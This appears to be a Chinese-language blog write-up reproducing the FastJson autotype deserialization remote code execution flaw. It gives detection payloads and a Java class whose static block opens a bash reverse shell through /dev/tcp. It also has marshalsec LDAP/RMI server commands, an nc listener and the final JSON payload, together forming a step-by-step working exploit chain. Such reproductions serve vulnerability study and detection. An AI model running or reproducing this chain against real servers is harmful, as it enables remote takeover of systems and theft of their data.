FastJson反序列化漏洞(复现)

漏洞介绍

FastJson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。

FastJson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的set/get方法来访问属性,当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据。

详细描述

漏洞利用FastJson autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。

攻击流程:制作反弹Payload -> 开启HTTP服务 -> 启动LDAP服务 -> 监听EXP中端口 -> 执行Payload

漏洞复现

LOGIN页面登录抓包

FastJson反序列化漏洞(复现)_第1张图片

添加字符破环原始json数据发现为fastjson

FastJson反序列化漏洞(复现)_第2张图片

验证是否存在fastjson漏洞(可利用Burp插件或检测脚本)

FastJson反序列化漏洞(复现)_第3张图片

或利用以下Payload DNSLog验证

{
 "a":{
 "@type":"java.lang.Class",
 "val":"com.sun.rowset.JdbcRowSetImpl"
 },
 "b":{
 "@type":"com.sun.rowset.JdbcRowSetImpl",
 "dataSourceName":"rmi://dnslog.cn地址/zcc",
 "autoCommit":true
 }
}

通过检测发现存在漏洞。

漏洞利用

前期准备:

1. 工具:GitHub - mbechler/marshalsec

下载后进入目录利用以下语句进行编译

 mvn clean package -DskipTests
 
 #编译可能会遇到问题,在此遇到JAVAC没装,装一下JAVAC就可以了(无报错请忽略)
 yum install java-devel

编译完成后会在target目录生成 marshalsec-0.0.3-SNAPSHOT-all.jar 文件

2. 新建一个fastjson.java文件,写exp代码。

vps,以及vps监听的端口6666
import java.lang.Runtime;
import java.lang.Process;
 
public class test {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/反弹IP端口 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

javac编译生成fastjson.class文件

javac ./fastjson.java

FastJson反序列化漏洞(复现)_第4张图片

3. 新建窗口,启动http服务

python3 -m http.server 8000

本地访问,测试是否服务正常启动。

FastJson反序列化漏洞(复现)_第5张图片

4. 新建窗口 VPS服务器启动LDAP服务,监听1099端口,并制定加载远程类

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://web服务IP:8000/#fastjson" 1099

5. 服务器监听4444端口(与3步fastjson.java中写的反弹ip端口一直)

nc -lvvp 4444  

6. 返回BURP构造Payload反弹Shell

{
"user":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},"password":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://IP:1099/fastjson",    #启动的LDAP服务ip+端口 (第5步)   
"autoCommit":true
}
}

FastJson反序列化漏洞(复现)_第6张图片

FastJson验证

抓包改为POST方式,添加字符破坏原有数据,返回包会出现fastjson字样,但是这个可以屏蔽
1.2.67版本前
{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog地址"}}
1.2.67版本后payload
{"@type":"java.net.Inet4Address","val":"dnslog地址"}
{"@type":"java.net.Inet6Address","val":"dnslog地址"}

发现了fastjson指纹,可以通过burp插件或脚本,检测是否存在漏洞。

相关工具:点击关注公众号:7Seven安全

参考:FastJson漏洞讲解:

关于fastjson 漏洞原理分析_toforu的博客-CSDN博客_fastjson漏洞原理

威胁研究 | Fastjson 最新反序列化漏洞复现与防御指南_shell

你可能感兴趣的:(漏洞复现,java,Web安全,FastJson反序列化)